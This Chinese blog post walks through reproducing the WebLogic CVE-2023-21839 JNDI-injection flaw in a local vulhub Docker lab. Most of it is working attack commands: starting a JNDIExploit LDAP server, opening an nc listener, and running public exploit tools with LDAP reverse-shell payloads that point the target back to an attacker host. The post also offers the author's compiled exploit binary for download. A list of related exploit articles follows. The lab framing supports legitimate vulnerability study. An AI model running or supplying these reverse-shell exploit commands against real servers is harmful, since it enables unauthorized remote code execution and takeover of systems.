CVE-2023-21839漏洞本地简单复现

简介: CVE-2023-21839漏洞本地简单复现

1. 说明


本文漏洞环境由vulhub下载后在本地部署:、


https://github.com/vulhub

本文漏洞利用工具1来源于:


https://github.com/DXask88MA/Weblogic-CVE-2023-21839(可能是我利用姿势不太对,没成功)

本文漏洞利用工具2来源于:


https://github.com/4ra1n/CVE-2023-21839

本文漏洞利用工具3来源于:


https://github.com/WhiteHSBG/JNDIExploit

我主要是对漏洞进行了本地的简单复现,其中用到的工具都是各位大神的,我对4ra1n大佬给的工具进行了编译。github源代码地址:

https://github.com/4ra1n/CVE-2023-21839

我自己编译之后的地址,请后台回复关键字 Weblogic 下载


2. 漏洞复现


2.1 漏洞原理


CVE-2023-21839允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作,当 JDK 版本过低或本地存在小工具(javaSerializedData)时,这可能会导致RCE漏洞。

以上来源于:

https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2023-21839/README.zh-cn.md


2.2 环境搭建


下载之后在本地使用docker部署:

docker-compose up -d

访问本地:http://127.0.0.1:7001/,出现以下界面证明环境搭建成功:

然后访问:http://127.0.0.1:7001/console/,等待几秒之后,即可访问到后台管理登录界面。

使用原来的Weblogic漏洞RCE神器进行测试,偶然发现存在cve-2016-3510


2.3 漏洞复现1-失败


攻击机kali192.168.135.22java11

目标机:10.30.0.214mac启动的dockerjava8

中转文件:JNDIExploit-1.4-SNAPSHOT.jar

kali上同时启动监听、命令执行、反弹shell的工作,先监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 10.30.0.214

然后在本地开启监听:

nc -lvnp 7777

使用下面的工具进行测试:

https://github.com/DXask88MA/Weblogic-CVE-2023-21839

命令(要记得使用java8的环境,不然会报错):

java -jar Weblogic-CVE-2023-21839.jar 10.30.0.214:7001 ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777
[*]java -jar 目标ip:端口 ldap地址
java -jar Weblogic-CVE-2023-21839.jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111

通过多次测试,发现还是有问题,能执行但是回不来:

可能是我的姿势不太对。。。

因为时间关系,暂时就不测试了。


2.4 漏洞复现2-成功


攻击机kali192.168.135.22java11

目标机:10.30.0.214mac启动的dockerjava8

中转文件:JNDIExploit-1.4-SNAPSHOT.jar

首先在kali上设置监听,用于接收反弹的shell

再通过kali上来设置监听:

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.135.22

最后使用工具来进行攻击测试,使用工具来源于:

https://github.com/4ra1n/CVE-2023-21839

将工具下载下来之后,在有go的环境中编译一下:

cd cmd
go build -o CVE-2023-21839

使用的时候,按照作者的方法来执行:

./CVE-2023-21839 -ip 10.30.0.214 -port 7001 -ldap ldap://192.168.135.22:1389/Basic/ReverseShell/192.168.135.22/7777
10.30.0.214为靶机
192.168.22.105为攻击机,也是接收反弹shell的ip

漏洞复现之后,记得及时关闭环境:


2.5 windows下工具使用


以上工具编译之后,在这里使用windows版本的试下:

同样可以成功。

相关文章
|
安全 Java 应用服务中间件
WebLogic Server 远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389)
WebLogic Server 存在远程代码执行漏洞,攻击者通过特定Payload对目标服务器进行恶意利用从而获取服务器控制权限,进一步操作。
1012 1
|
SQL 监控 druid
Druid未授权访问 漏洞复现
Druid未授权访问 漏洞复现
21719 1
|
存储 域名解析 供应链
阿里云 OSS对象存储攻防
本文分为两个部分 第一部分介绍OSS对象存储攻防的方式 第二部分为真实漏洞案例
3955 0
阿里云 OSS对象存储攻防
|
10月前
|
存储 JavaScript 安全
Web渗透-XSS漏洞深入及xss-labs靶场实战
XSS(跨站脚本攻击)是常见的Web安全漏洞,通过在网页中注入恶意脚本,窃取用户信息或执行非法操作。本文介绍其原理、分类(反射型、存储型、DOM型)、测试方法及xss-labs靶场实战案例,帮助理解与防御XSS攻击。
2853 1
Web渗透-XSS漏洞深入及xss-labs靶场实战
|
10月前
|
数据采集 安全 算法
2024第十五届蓝桥杯网络安全赛道省赛题目writeup(包含理论题、web、crypto、misc、reverse、pwn)
本文是2024年第十五届蓝桥杯网络安全赛道CTF真题赛题详解。主要内容包括PHP运算符、代码审计、爬虫协议、流量分析、AES/RSA加密、DWT盲水印、逆向工程、栈溢出和堆漏洞利用等技术点。其中,爬虫协议题目通过访问robots.txt获取flag;流量分析题目使用Wireshark导出HTTP对象并解密base64数据;逆向工程题目分析RC4和XXTEA算法;Pwn题目利用栈溢出和UAF漏洞实现攻击。文章详细记录了每道题的解题思路和具体步骤。
2024第十五届蓝桥杯网络安全赛道省赛题目writeup(包含理论题、web、crypto、misc、reverse、pwn)
|
安全 网络协议 Java
Apache Log4j远程代码执行漏洞详解与利用指南
在尝试连接至192.168.0.1的9999端口时,采用base64编码可以进一步提升连接的安全性。通过将连接命令进行base64编码,然后在目标系统上执行解码操作,从而实现对9999端口的隐蔽且安全的连接。但请务必在合法且获得明确授权的前提下使用此方法,同时需严格遵循相关法规和道德规范。
|
消息中间件 安全 Java
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
本文介绍了多个软件的安全漏洞及其复现过程,涉及的软件包括Vulhub、Flask、ActiveMQ、Adminer、Airflow、Apache Druid、Apereo CAS、APISIX、AppWeb、Aria2、Bash、Cacti、Celery、CGI、ColdFusion和Confluence。每个部分详细描述了漏洞的背景、环境搭建步骤、漏洞复现的具体操作和验证方法。例如,Flask的SSTI漏洞通过构造特定的模板参数实现命令执行;ActiveMQ的反序列化漏洞利用特制的序列化对象触发;这些示例不仅展示了漏洞的危害性,还提供了实际的复现步骤,帮助读者深入理解这些安全问题。
3796 3
vulhub部分复现记录(后面大概都是原文档了,也比较难复现就不继续了)
|
安全 应用服务中间件 网络安全
渗透测试-Tomcat文件读取漏洞复现
渗透测试-Tomcat文件读取漏洞复现
598 10
|
安全 Shell Linux
Webshell管理工具:AntSword(中国蚁剑)
中国蚁剑的下载、安装、详细使用步骤
15955 1
|
安全 Oracle 关系型数据库
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现

热门文章

最新文章